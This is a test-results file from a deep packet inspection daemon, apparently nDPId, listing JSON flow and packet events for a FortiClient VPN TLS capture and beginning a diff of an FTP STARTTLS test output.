+01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} +01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":298759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1621067222261} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 diff --git a/test/results/ftp-start-tls.pcap.out b/test/results/ftp-start-tls.pcap.out index 9f86287b9..d31c3014b 100644 --- a/test/results/ftp-start-tls.pcap.out +++ b/test/results/ftp-start-tls.pcap.out @@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp-start-tls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1383123629078} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383123629078,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383123629078,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} 